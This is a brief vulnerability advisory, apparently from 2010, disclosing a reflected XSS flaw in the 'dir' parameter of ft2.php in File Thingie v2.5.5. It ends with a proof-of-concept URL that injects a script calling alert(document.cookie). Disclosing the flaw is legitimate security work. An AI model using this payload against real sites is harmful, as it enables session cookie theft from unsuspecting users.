[#]----------------------------------------------------------------------------------------] [#] Title: File Thingie v2.5.5 XSS Vulnerability [#] Author: Jeremiah Talamantes (RedTeam Security) [#] Website: http://www.redteamsecure.com/labs [#] Date: 5/15/2010 [#] [#] Application: File Thingie [#] Version: 2.5.5 [#] Link: http://www.solitude.dk/filethingie/download [#] Description: The vulnerability exists due to a failure in the "ft2.php" script [#] to properly sanitize data. Successful compromise could result in theft of [#] cookie data. [#]----------------------------------------------------------------------------------------] [ EXPLOIT POC ---------------------------------------------------------------------------------] http://example.com/ft2.php?dir=2%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E [ EXPLOIT POC ---------------------------------------------------------------------------------]